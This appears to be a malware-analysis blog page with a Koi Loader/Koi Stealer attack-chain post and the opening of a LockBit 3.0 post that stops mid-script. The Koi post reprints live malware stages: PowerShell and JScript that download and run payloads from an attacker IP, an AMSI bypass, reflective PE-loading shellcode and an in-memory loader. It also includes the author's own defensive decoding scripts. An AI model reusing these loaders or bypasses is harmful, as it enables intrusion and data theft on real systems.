Thinkbox

Koi Loader Attack Chain Analysis

Aleks — Wed, 21 May 2025 18:51:44 GMT

Overview

This post will cover at a high level the attack chain that Koi Loader takes in order to deploy Koi stealer on a system. All artifacts and samples were retrieved from Malware Traffic.

Fake Installer Initial Execution

Fake Installer

Initial access for this sample took form of a digitally singed fake installer file.

Digitally Singed Fake Installer

The executable file was singed with a valid certificate authority Certum and created for Zhengzhou Lichang Network Technology.

SignerCertificate      : [Subject]
                           CN="Zhengzhou Lichang Network Technology Co., Ltd.", O="Zhengzhou Lichang Network
                         Technology Co., Ltd.", L=Zhengzhou, S=Henan, C=CN, SERIALNUMBER=91410122MA40Y0N9XP,
                         OID.1.3.6.1.4.1.311.60.2.1.1=Zhengzhou, OID.1.3.6.1.4.1.311.60.2.1.2=Henan,
                         OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization

                         [Issuer]
                           CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL

                         [Serial Number]
                           04EBDA42BF9235AECF2E07587EC4623F

                         [Not Before]
                           11/20/2024 10:40:35 PM

                         [Not After]
                           11/20/2025 10:40:34 PM

                         [Thumbprint]
                           B78EDD5FFE3A45F2993E98F9CCE5F0187EE880BD

Certificate of Fake Installer

The fake installer was created with Inno Setup. The software InnoUnpacker can be used to extract the contents of this installer file.

Contents of Fake Installer

This installer packages multiple files, however, these are not used or dropped to the system. They are just dummy files.

Dummy Program from Fake Installer

Inno Setup has the capability to add various capabilities in the created installer via a Pascal scripting feature. Any scripts added are compiled and stored in the CompiledCode.bin file.

Hexdump of CompiledCode.bin

Within the CompiledCode.bin strings we can see malicious Powershell commands present.

Strings from CompiledCode.bin

The following is the entire decompiled version of CompiledCode.bin which was decompiled with IPFSTools.NET.

.version 23

.entry !MAIN

.type primitive(Pointer) Pointer
.type primitive(U32) U32
.type primitive(Variant) Variant
.type primitive(PChar) PChar
.type primitive(Currency) Currency
.type primitive(Extended) Extended
.type primitive(Double) Double
.type primitive(Single) Single
.type primitive(S64) S64
.type primitive(String) String
.type primitive(U32) U32_2
.type primitive(S32) S32
.type primitive(S16) S16
.type primitive(U16) U16
.type primitive(S8) S8
.type(export) funcptr(void()) ANYMETHOD
.type primitive(String) String_2
.type primitive(UnicodeString) UnicodeString
.type primitive(UnicodeString) UnicodeString_2
.type primitive(String) String_3
.type primitive(UnicodeString) UnicodeString_3
.type primitive(WideString) WideString
.type primitive(WideChar) WideChar
.type primitive(WideChar) WideChar_2
.type primitive(Char) Char
.type primitive(U8) U8
.type primitive(U16) U16_2
.type primitive(U32) U32_3
.type(export) primitive(U8) BOOLEAN
.type primitive(U8) U8_2
.type(export) class(TWIZARDFORM) TWIZARDFORM
.type(export) class(TMAINFORM) TMAINFORM
.type(export) class(TUNINSTALLPROGRESSFORM) TUNINSTALLPROGRESSFORM
.type(export) primitive(U8) TEXECWAIT

.global(import) TWIZARDFORM WIZARDFORM
.global(import) TMAINFORM MAINFORM
.global(import) TUNINSTALLPROGRESSFORM UNINSTALLPROGRESSFORM

.function(export) void !MAIN()
	ret

.function(export) BOOLEAN INITIALIZESETUP()
	pushtype S32 ; StackCount = 1
	pushvar RetVal ; StackCount = 2
	call WIZARDSILENT
	pop ; StackCount = 1
	pushtype BOOLEAN ; StackCount = 2
	assign Var2, RetVal
	setz Var2
	sfz Var2
	pop ; StackCount = 1
	jf loc_27b
	pushtype BOOLEAN ; StackCount = 2
	pushtype Pointer ; StackCount = 3
	setptr Var3, Var1
	pushtype TEXECWAIT ; StackCount = 4
	assign Var4, TEXECWAIT(0)
	pushtype S32 ; StackCount = 5
	assign Var5, S32(0)
	pushtype UnicodeString_2 ; StackCount = 6
	assign Var6, UnicodeString_3("")
	pushtype UnicodeString_2 ; StackCount = 7
	assign Var7, UnicodeString_3("-command IWR -UseBasicParsing -Uri 'http://79.124.78.109/wp-includes/neocolonialXAW.php' -OutFile ($env:temp+'\\vqPM0l4stR.js'); wscript ($env:temp+'\\vqPM0l4stR.js');")
	pushtype UnicodeString_2 ; StackCount = 8
	pushtype UnicodeString_2 ; StackCount = 9
	assign Var9, UnicodeString_3("{sysnative}\\WindowsPowerShell\\v1.0\\powershell.exe")
	pushvar Var8 ; StackCount = 10
	call EXPANDCONSTANT
	pop ; StackCount = 9
	pop ; StackCount = 8
	pushvar Var2 ; StackCount = 9
	call EXEC
	pop ; StackCount = 8
	pop ; StackCount = 7
	pop ; StackCount = 6
	pop ; StackCount = 5
	pop ; StackCount = 4
	pop ; StackCount = 3
	pop ; StackCount = 2
	pop ; StackCount = 1
loc_27b:
	ret

.function(import) external internal returnsval WIZARDSILENT()

.function(import) external internal returnsval EXEC(__in __unknown,__in __unknown,__in __unknown,__in __unknown,__in __unknown,__out __unknown)

.function(import) external internal returnsval EXPANDCONSTANT(__in __unknown)

Decompiled Pascal Script from Inno Setup

From this decompiled code we can determine that the installer will first download a Javascript file and write it to a temporary directory, after it will invoke the Javascript file via wscript.

IWR -UseBasicParsing -Uri 'hxxp://79.124.78.109/wp-includes/neocolonialXAW.php' -OutFile ($env:temp+'\vqPM0l4stR.js');
wscript ($env:temp+'\vqPM0l4stR.js');

The following diagram summarizes the core steps the fake installer will take in order to execute Koi Loader, which will subsequently run Koi Stealer. The next sections will dive deeper into each step taken after the execution of the fake installer.

Fake Installer Flow Diagram

Download #1 - Malicious Javascript Code

The first step after the execution of the fake installer is the download of malicious Javascript code that will be written to a temporary folder.

The fake installer will directly execute:

IWR -UseBasicParsing -Uri 'http://79.124.78.109/wp-includes/neocolonialXAW.php' -OutFile ($env:temp+'\\vqPM0l4stR.js');

This will result in the Javascript file download over HTTP.

Network Request from Javascript File

This script has the responsibility to download and run two separate Powershell scripts.

hxxp://79.124.78.109/wp-includes/phyllopodan7V7GD.php: AMSI Bypass Script
hxxp://79.124.78.109/wp-includes/barasinghaby.ps1: Koi Loader Downloader

// Create file system object for file manipulation
var fso = new ActiveXObject("Scripting.FileSystemObject");

// Create Windows Script Host object to run system commands
var wsh = new ActiveXObject("WScript.Shell");

// Detect system architecture (64-bit or 32-bit)
var systemFolder = GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth == 64 ? "SysWOW64" : "System32";

// Get the path to PowerShell executable based on system architecture
var powershellPath = wsh.ExpandEnvironmentStrings("%SYSTEMROOT%") + "\\" + systemFolder + "\\WindowsPowerShell\\v1.0\\powershell.exe";

// Generate a unique filename based on MachineGuid from the registry
var uniqueFileName = 'r' + wsh.RegRead('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid') + 'r.js';

// Check if the current script is already named with the unique filename
if (WScript.ScriptName != uniqueFileName) {
    try {
        // Copy the current script to the ProgramData folder with the unique name
        fso.CopyFile(WScript.ScriptFullName, wsh.ExpandEnvironmentStrings("%programdata%") + "\\" + uniqueFileName);
    } catch (e) {
        // Handle any errors (e.g., permission issues)
    }
}

// Define a temporary file name for a potential malicious file
var tempFileName = "7zTJRTNUX3VD";
var tempFilePath = wsh.ExpandEnvironmentStrings("%temp%") + "\\" + tempFileName;

// Try to delete the temporary file if it exists
try {
    fso.DeleteFile(tempFilePath);
} catch (e) {
    // Handle any errors (e.g., file not found)
}

// Check if the temporary file does not exist
if (!fso.FileExists(tempFilePath)) {
    // Run the PowerShell command to download and execute malicious scripts
    var command = powershellPath + " -command \"$l1 = 'http://79.124.78.109/wp-includes/phyllopodan7V7GD.php'; " +
                  "$l2 = 'http://79.124.78.109/wp-includes/barasinghaby.ps1'; " +
                  "$a = [Ref].Assembly.GetTypes(); " +
                  "foreach ($b in $a) { if ($b.Name -like '*siU*s') { $c = $b } }; " +
                  "$env:paths = '" + tempFileName + "'; " +
                  "IEX (Invoke-WebRequest -UseBasicParsing $l1); " +
                  "IEX (Invoke-WebRequest -UseBasicParsing $l2)\"";
    wsh.Run(command, 0);
}

Malicious Javascript File

Download #2 - AMSI Bypass

The first Powershell script to be downloaded and executed included a AMSI bypass.

AMSI Bypass Script over Network

# Define a string pattern to be matched
$pattern = "yyWubZA2bLJUiTqmHcYttKZ7DIVYqf47J6AeiTqmHcYttKZ7jq9faTN5t7IeiTqmHcYttKZ7SuwSufiXjG2hiTqmHcYttKZ7jd78eScwXsGtiTqmHcYttKZ71CcOWkfJwaYtiTqmHcYttKZ7pGvxphMdyojsiTqmHcYttKZ7aq2glEPfEC9F"

# Match the pattern in the string
$matchedString = $pattern -match "iTqmHcYttKZ7"

# Get non-public static fields of the class (assuming `$c` is defined elsewhere)
$fields = $c.GetFields("NonPublic,Static")

# Iterate over the fields and set values based on a condition
foreach ($field in $fields) {
    if ($field.Name -like "*am*ed") {
        $field.SetValue($null, $matchedString)
    }
}

AMSI Bypass

Download #3 - Koi Loader Download

The second Powershell script downloaded and executed is responsible for the execution of Koi loader.

Koi Loader Downloader

The Powershell script contains a hardcoded path hxxp://79.124.78.109/wp-includes/guestwiseYtHA.exe from which the Koi loader will be downloaded from. In addition the script contains shellcode that will be used to map the Koi loader PE into memory.

[Byte[]]$targetPE = (IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/guestwiseYtHA.exe').Content;

function GDT
{
    Param
    (
        [OutputType([Type])]
            
        [Parameter( Position = 0)]
        [Type[]]
        $Parameters = (New-Object Type[](0)),
            
        [Parameter( Position = 1 )]
        [Type]
        $ReturnType = [Void]
    )

    $DA = New-Object System.Reflection.AssemblyName('RD')
    $AB = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DA, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
    $MB = $AB.DefineDynamicModule('IMM', $false)
    $TB = $MB.DefineType('MDT', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $CB = $TB.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
    $CB.SetImplementationFlags('Runtime, Managed')
    $MB = $TB.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
    $MB.SetImplementationFlags('Runtime, Managed')
        
    Write-Output $TB.CreateType()
}

function GPA
{
    Param
    (
        [OutputType([IntPtr])]
        
        [Parameter( Position = 0, Mandatory = $True )]
        [String]
        $Module,
            
        [Parameter( Position = 1, Mandatory = $True )]
        [String]
        $Procedure
    )

    $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
    $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
    $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
    $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null)
    $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
    $tmpPtr = New-Object IntPtr
    $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
        
    Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
}

$marshal = [System.Runtime.InteropServices.Marshal]

[Byte[]]$peMappingShellcode = 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x56, 0x57, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x40, 0x0C, 0x8B, 0x00, 0x8B, 0x00, 0x8B, 0x40, 0x18, 0x89, 0x45, 0xF8, 0x8B, 0x75, 0xF8, 0xBA, 0xF1, 0xF0, 0xAD, 0x0A, 0x8B, 0xCE, 0xE8, 0xD2, 0x01, 0x00, 0x00, 0xBA, 0x03, 0x1D, 0x3C, 0x0B, 0x89, 0x45, 0xF0, 0x8B, 0xCE, 0xE8, 0xC3, 0x01, 0x00, 0x00, 0xBA, 0xE3, 0xCA, 0xD8, 0x03, 0x89, 0x45, 0xEC, 0x8B, 0xCE, 0xE8, 0xB4, 0x01, 0x00, 0x00, 0x8B, 0xD8, 0x8B, 0x45, 0x08, 0x6A, 0x40, 0x68, 0x00, 0x30, 0x00, 0x00, 0x8B, 0x70, 0x3C, 0x03, 0xF0, 0x89, 0x75, 0xFC, 0xFF, 0x76, 0x50, 0xFF, 0x76, 0x34, 0xFF, 0xD3, 0x8B, 0xF8, 0x85, 0xFF, 0x75, 0x17, 0x6A, 0x40, 0x68, 0x00, 0x30, 0x00, 0x00, 0xFF, 0x76, 0x50, 0x50, 0xFF, 0xD3, 0x8B, 0xF8, 0x85, 0xFF, 0x0F, 0x84, 0x66, 0x01, 0x00, 0x00, 0x8B, 0x56, 0x54, 0x85, 0xD2, 0x74, 0x18, 0x8B, 0x75, 0x08, 0x8B, 0xCF, 0x2B, 0xF7, 0x8A, 0x04, 0x0E, 0x8D, 0x49, 0x01, 0x88, 0x41, 0xFF, 0x83, 0xEA, 0x01, 0x75, 0xF2, 0x8B, 0x75, 0xFC, 0x0F, 0xB7, 0x4E, 0x14, 0x33, 0xC0, 0x03, 0xCE, 0x33, 0xDB, 0x89, 0x4D, 0xF4, 0x66, 0x3B, 0x46, 0x06, 0x73, 0x44, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0F, 0xB7, 0xC3, 0x8D, 0x04, 0x80, 0x8B, 0x54, 0xC1, 0x28, 0x8B, 0x74, 0xC1, 0x2C, 0x8B, 0x4C, 0xC1, 0x24, 0x03, 0x75, 0x08, 0x03, 0xCF, 0x85, 0xD2, 0x74, 0x13, 0x2B, 0xF1, 0x0F, 0x1F, 0x00, 0x8A, 0x04, 0x0E, 0x8D, 0x49, 0x01, 0x88, 0x41, 0xFF, 0x83, 0xEA, 0x01, 0x75, 0xF2, 0x8B, 0x75, 0xFC, 0x43, 0x8B, 0x4D, 0xF4, 0x66, 0x3B, 0x5E, 0x06, 0x72, 0xC5, 0x8B, 0x86, 0x80, 0x00, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x76, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x14, 0x72, 0x6D, 0x83, 0x7C, 0x38, 0x0C, 0x00, 0x8D, 0x1C, 0x38, 0x89, 0x5D, 0x08, 0x74, 0x60, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x8B, 0x43, 0x0C, 0x03, 0xC7, 0x50, 0xFF, 0x55, 0xF0, 0x8B, 0xD0, 0x89, 0x55, 0xF4, 0x85, 0xD2, 0x74, 0x3A, 0x8B, 0x73, 0x10, 0x8B, 0x0B, 0x85, 0xC9, 0x8D, 0x1C, 0x3E, 0x0F, 0x45, 0xF1, 0x03, 0xF7, 0x8B, 0x06, 0x85, 0xC0, 0x74, 0x22, 0x79, 0x05, 0x0F, 0xB7, 0xC0, 0xEB, 0x05, 0x83, 0xC0, 0x02, 0x03, 0xC7, 0x50, 0x52, 0xFF, 0x55, 0xEC, 0x8B, 0x55, 0xF4, 0x83, 0xC6, 0x04, 0x89, 0x03, 0x83, 0xC3, 0x04, 0x8B, 0x06, 0x85, 0xC0, 0x75, 0xDE, 0x8B, 0x5D, 0x08, 0x83, 0xC3, 0x14, 0x89, 0x5D, 0x08, 0x83, 0x7B, 0x0C, 0x00, 0x75, 0xA8, 0x8B, 0x75, 0xFC, 0x8B, 0xDF, 0x2B, 0x5E, 0x34, 0x83, 0xBE, 0xA4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x52, 0x8B, 0x86, 0xA0, 0x00, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x48, 0x83, 0x3C, 0x38, 0x00, 0x8D, 0x14, 0x38, 0x74, 0x3F, 0x0F, 0x1F, 0x40, 0x00, 0x8B, 0x72, 0x04, 0x8D, 0x42, 0x04, 0x83, 0xEE, 0x08, 0x89, 0x45, 0x08, 0xD1, 0xEE, 0xB9, 0x00, 0x00, 0x00, 0x00, 0x74, 0x1C, 0x0F, 0xB7, 0x44, 0x4A, 0x08, 0x66, 0x85, 0xC0, 0x74, 0x0A, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x03, 0x02, 0x01, 0x1C, 0x38, 0x41, 0x3B, 0xCE, 0x72, 0xE7, 0x8B, 0x45, 0x08, 0x03, 0x10, 0x83, 0x3A, 0x00, 0x75, 0xC8, 0x8B, 0x75, 0xFC, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x89, 0x78, 0x08, 0x8B, 0x46, 0x28, 0x03, 0xC7, 0xFF, 0xD0, 0x5F, 0x5E, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF8, 0x56, 0x57, 0x33, 0xFF, 0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x48, 0x1C, 0x8B, 0x50, 0x24, 0x03, 0xCB, 0x03, 0xD3, 0x89, 0x4D, 0xEC, 0x8B, 0x48, 0x20, 0x03, 0xCB, 0x89, 0x55, 0xF0, 0x8B, 0x50, 0x18, 0x89, 0x4D, 0xF4, 0x89, 0x55, 0xFC, 0x85, 0xD2, 0x74, 0x4B, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x8B, 0x34, 0xB9, 0x03, 0xF3, 0x74, 0x3A, 0x8A, 0x0E, 0x33, 0xC0, 0x84, 0xC9, 0x74, 0x2A, 0x90, 0xC1, 0xE0, 0x04, 0x8D, 0x76, 0x01, 0x0F, 0xBE, 0xC9, 0x03, 0xC1, 0x8B, 0xD0, 0x81, 0xE2, 0x00, 0x00, 0x00, 0xF0, 0x74, 0x07, 0x8B, 0xCA, 0xC1, 0xE9, 0x18, 0x33, 0xC1, 0x8A, 0x0E, 0xF7, 0xD2, 0x23, 0xC2, 0x84, 0xC9, 0x75, 0xDA, 0x8B, 0x55, 0xFC, 0x3B, 0x45, 0xF8, 0x74, 0x11, 0x8B, 0x4D, 0xF4, 0x47, 0x3B, 0xFA, 0x72, 0xBA, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45, 0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC

$VAAddr = GPA kernel32.dll VirtualAlloc
$VADeleg = GDT @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])
$VA = $marshal::GetDelegateForFunctionPointer($VAAddr, $VADeleg)
$CTAddr = GPA kernel32.dll CreateThread
$CTDeleg = GDT @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
$CT = $marshal::GetDelegateForFunctionPointer($CTAddr, $CTDeleg)
$WFSOAddr = GPA kernel32.dll WaitForSingleObject
$WFSODeleg = GDT @([IntPtr], [Int32]) ([Int])
$WFSO = $marshal::GetDelegateForFunctionPointer($WFSOAddr, $WFSODeleg)

# Put PE Mapping Shellcode into RX Buffer
$peMappingShellcodeBuffer=$VA.Invoke(0,$peMappingShellcode.Length, 0x3000, 0x40)
$marshal::Copy($peMappingShellcode, 0, $peMappingShellcodeBuffer, $peMappingShellcode.Length);

# Put Target PE File into Buffer
$targetPEBuffer = $marshal::AllocHGlobal($targetPE.Length)
$marshal::Copy($targetPE, 0, $targetPEBuffer, $targetPE.Length);

# Run the PE Mapping Shellcode as Thread, and Pass the Target PE File as Paramter
$thread = $CT.Invoke([int]$false, [int]$false, $peMappingShellcodeBuffer, $targetPEBuffer, 0, 0);
$WFSO.Invoke($thread, -1);

Koi Loader Downloader Script

Koi Loader Analysis

Unpacking

Koi Loader is initially present in a packed form before the true Koi loader is executed on the system. The packer starts with junk code and contains a function in the end that initiates the unpacking logic.

Main function of the Koi Loader Packer

The core unpacking function will take the following steps:

Retrieve the encrypted Koi loader payload from resource 54518 .
Retrieve the XOR keystream from resource 39596 .
Decrypt the encrypted Koi loader payload.
Map the Koi loader inside memory.
Execute the entrypoint of Koi loader.

Core Unpacking Logic

The loader had one instance of API hash resolution in the function that fetches the contents of a specified resource.

Resource Fetching Function

The following script was created in order to implement the API hashing routine and understand the three API hashes used in the function.

import pefile

def hash_string(string):
    
    api_hash = 0
    
    for current_char in string:
        
        api_hash = (api_hash * 16) + ord(current_char)
        loop_value_temp = api_hash & 0xF0000000
        
        if loop_value_temp != 0:
            api_hash = (loop_value_temp >> 0x18) ^ api_hash
            
        api_hash = api_hash & (~loop_value_temp)
            
    return api_hash
 

def resolve_hashes(dll_path, hashes):
    pe = pefile.PE(dll_path)

    if not hasattr(pe, 'DIRECTORY_ENTRY_EXPORT'):
        print("[-] No export table found.")
        return

    print(f"[+] Exported functions in: {dll_path}\n")

    for i, exp in enumerate(pe.DIRECTORY_ENTRY_EXPORT.symbols):
        name = exp.name.decode() if exp.name else ""
        ordinal = exp.ordinal
        address = hex(pe.OPTIONAL_HEADER.ImageBase + exp.address)
        
        if hash_string(name) in hashes:
            print(hex(hash_string(name)))
            print(f"{i+1:3}: {name:40} Ordinal: {ordinal:5} Address: {address}")

# === Main ===
if __name__ == "__main__":
    
    hashes = [0x5681127, 0x9B3B115, 0xDAA96B5]
    
    dll_path = r"C:\Windows\System32\kernel32.dll"
    resolve_hashes(dll_path, hashes)
    
    # Example, should return 0x0BA853A5
    #print(hex(hash_string("AcquireSRWLockExclusive")))

API Hash resolver

The core of this unpacking routine is to extract the XOR keystream and encrypted payload from the resource.

Resources in Packed Koi Loader

However, the encrypted payload has each byte separated by 00's, this is taken into consideration in the packer by multiplying the index into the encrypted data by 2 in order to skip each 00.

Skipping Each 00 in Encrypted Payload

The following script was written to parse the encrypted payload and XOR keystream and decrypt the contents.

import pefile

def extract_resource_by_id(pe_path, resource_id):
    pe = pefile.PE(pe_path)

    if not hasattr(pe, 'DIRECTORY_ENTRY_RESOURCE'):
        print("[-] No resources found in this PE file.")
        return

    for entry in pe.DIRECTORY_ENTRY_RESOURCE.entries:
        if entry.name is not None:
            continue  # Skip named root entries

        if entry.id == pefile.RESOURCE_TYPE['RT_RCDATA']:  # RCDATA is most common for custom binary blobs
            for res in entry.directory.entries:
                if res.id == resource_id:
                    data_rva = res.directory.entries[0].data.struct.OffsetToData
                    size = res.directory.entries[0].data.struct.Size
                    data_offset = pe.get_offset_from_rva(data_rva)
                    data = pe.__data__[data_offset:data_offset+size]
                    
                    print(f"[+] Found resource ID {resource_id}, size: {size} bytes")
                    return data, size

    print(f"[-] Resource with ID {resource_id} not found.")
    return None

def unpack(pe_path, xor_keystream_resource_id, encrypted_payload_resource_id):
    
    xor_keystream, xor_keystream_size = extract_resource_by_id(pe_path, xor_keystream_resource_id)
    encrypted_payload, encrypted_payload_size = extract_resource_by_id(pe_path, encrypted_payload_resource_id)
    encrypted_payload_2 = b''
    
    i = 0    
    while i < (encrypted_payload_size / 2):
        encrypted_payload_2 = encrypted_payload_2 + encrypted_payload[i * 2].to_bytes()
        i = i + 1
    
    decrypted_payload = b''
    
    for i, value in enumerate(encrypted_payload_2):
        decrypted_byte = encrypted_payload_2[i] ^ xor_keystream[i % xor_keystream_size]
        decrypted_payload = decrypted_payload + decrypted_byte.to_bytes()
    
    if decrypted_payload:
        with open("decrypted_payload.bin", "wb") as f:
            f.write(decrypted_payload)
        print("[+] Resource dumped to decrypted_payload.bin")


if __name__ == "__main__":
    pe_path = r"2025-01-23-http___79.124.78.109_wp-includes_guestwiseYtHA.exe.bin" 
    xor_keystream_resource_id = 39596
    encrypted_payload_resource_id = 54518

    unpack(pe_path, xor_keystream_resource_id, encrypted_payload_resource_id)

Decrypt Koi Loader from Resources

Core Koi Loader

The core of Koi loader will download another Powershell script and execute it. The script downloaded is dependent on the version of .NET available on the system. This is because Koi stealer is written in C# using .NET.

The following is the Powershell script that contains an encrypted version of Koi stealer embedded. This will be decrypted and loaded into memory.

[byte[]] $bindata = 0x09, 
0x12, 0xd9, 0x38, 0x30, 0x6c, 0x33, 0x6b, 0x31, 0x6c, 0x48, 0x49, 0xb7, 0xae, 0x79, 0x61, 
0x88, 0x6b, 0x4e, 0x75, 0x44, 0x48, 0x49, 0x38, 0x73, 0x6c, 0x33, 0x6b, 0x35, 0x6c, 0x48, 
0x49, 0x48, 0x51, 0x79, 0x61, 0x30, 0x6b, 0x4e, 0x75, 0x44, 0x48, 0x49, 0x38, 0x33, 0x6c, 
[REMOVED BECAUSE IT IS TOO LARGE]

# [Net.ServicePointManager]::SecurityProtocol +='tls12'
$guid = (Get-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Cryptography).MachineGuid
$cfb = (new-object net.webclient).downloadstring("http://79.124.78.109/index.php?id=$guid&subid=zweyWGzf").Split('|')
$k = $cfb[0];

for ($i = 0; $i -lt $bindata.Length ; ++$i)
{
	$bindata[$i] = $bindata[$i] -bxor $k[$i % $k.Length]
}

$bf = [System.Reflection.BindingFlags]::NonPublic -bor [System.Reflection.BindingFlags]::Static
$typee = [System.Type]::GetType("System.Reflection.Assembly")
$mtd = $typee.GetMethod("Load", [Type[]]@([byte[]]))

$sm = $mtd.Invoke($null, @(,$bindata))
$ep = $sm.EntryPoint


$ep.Invoke($null, (, [string[]] ($cfb[1], $cfb[2], $cfb[3])))

The call to hxxp://79.124.78.109/index.php?id=$guid&subid=zweyWGzf will download multiple parameters.

Once the .NET executable is decrypted it is loaded into memory the execution of Koi stealer begins.

Lockbit 3.0 Analysis

Aleks — Sun, 30 Mar 2025 14:46:45 GMT

Overview

This post contains my analysis of various components of Lockbit 3.0. It mainly covers various anti-analysis and anti-debugging capabilities built in, multiple checks conducted before encryption, and how the configuration is stored within the sample. This analysis does not go into depth on the encryption mechanism used in Lockbit 3.0.

Anti-Analysis

Password Prompt

When the password option is enabled for Lockbit, a password string must be passed to -pass in order to decrypt the .text contents of Lockbit.

Lockbit Main Logic Decryption with Password

When the password option is enabled the entry point is directed to the .itext section which contains a function to decrypt the .text and redirect the control flow after it has been decrypted.

API Hashing

When Lockbit is first executed, it will aim to resolve a API function call table from a list of API hashes which will be used throughout the lifetime of the execution.

Within the .text section there are multiple API hash tables. The first hash will always refer to the DLL followed by a list of API hashes which end with a 0xCCCCCCCC.

API Hash Table

Lockbit will first invoke multiple functions that loop over each table and resolve each API hash to their corresponding function.

API Hash Table Resolution Functions

The function responsible for populating the function tables will loop over each entry in the API hash table, for each API hash it will resolve to the corresponding pointer to the function. After, it will allocate a buffer on the heap where a trampoline function will be constructed to direct the caller to the resolved function.

Initiation of the API Hash Table resolution routine

After the API hash is resolved and we have a function pointer to the desired function, a trampoline function will be constructed which will be responsible for calling this function.

Trampoline Function Construction

The following shows the construction of a trampoline function, note that the pointer to the function is always encoded when written to the buffer. This makes it difficult to understand what the function points to and can impact the ability to fix the function table if dumping from memory.

Creation of a Trampoline Jump Function

There are 5 different trampoline functions that an be constructed for any given function, which one is used is decided by a random number that is generated. They all provide the same result and differ only in how they encode the pointer to the function.

EncodedAPIHash = ROR(RESOLVED_API_FUNCTION_PTR, RandomByte)
mov eax, EncodedAPIHash
rol eax, RandomByte
jmp eax

API Hash Trampoline Case 1

EncodedAPIHash = XOR(RESOLVED_API_FUNCTION_PTR, 0x10035FFF)
mov eax, EncodedAPIHash
xor eax, 0x10035FFF
jmp eax

API Hash Trampoline Case 2

EncodedAPIHash = ROL(XOR(RESOLVED_API_FUNCTION_PTR, 0x10035FFF), RandomByte)
mov eax, EncodedAPIHash
ror eax, RandomByte
xor eax, EncodedAPIHash
jmp eax

API Hash Trampoline Case 3

EncodedAPIHash = ROR(XOR(RESOLVED_API_FUNCTION_PTR, 0x10035FFF), RandomByte)
mov eax, EncodedAPIHash
rol eax, RandomByte
xor eax, EncodedAPIHash
jmp eax

API Hash Trampoline Case 4

EncodedAPIHash = ROL(RESOLVED_API_FUNCTION_PTR, RandomByte)
mov eax, EncodedAPIHash
ror eax, RandomByte
jmp eax

API Hash Trampoline Case 5

In the end there is a table where each trampoline function will be stored. Rather than invoking these functions directly, they will always go through the trampoline function.

API Function Call Table

Stack Strings

Stack strings are used to encode strings and other data in order to prevent it from being identified through static means. The function responsible for decoding the stack strings will take a pointer to the beginning of the stack string buffer, and the number of encoded DWORD sized entries.

Example of Stack String

For each DWORD in the stack string it will be decoded by XOR'ing with a hardcoded value and then inverting all the bytes.

Stack String Decoding Routine

The following IDAPython script was used in order to find all stack strings, resolve them, and leave a comment indicating the string.

import idc
import idautils

def flip_bytearray(bytearray_data):

	size = len(bytearray_data)
	flipped = bytearray(size)

	for i, byte in enumerate(bytearray_data):
		flipped[size - 1] = bytearray_data[i]
		size = size - 1
	return flipped


def invert_bytearrays(bytearray_data):
	for i, byte in enumerate(bytearray_data):
		if bytearray_data[i] == 0xFF:
			bytearray_data[i] = 0x00
			continue
		bytearray_data[i] = ~bytearray_data[i] & 0xFF	
	return bytearray_data


def xor_bytearrays(bytearray1, bytearray2):
	if len(bytearray1) != len(bytearray2):
		return

	for i, byte in enumerate(bytearray1):
		bytearray1[i] = bytearray1[i] ^ bytearray2[i]
	return bytearray1

def invert_hex_dword(hex_value):
    # Ensure the input is a 32-bit unsigned integer (DWORD)
    dword = hex_value & 0xFFFFFFFF  # Mask to 32 bits
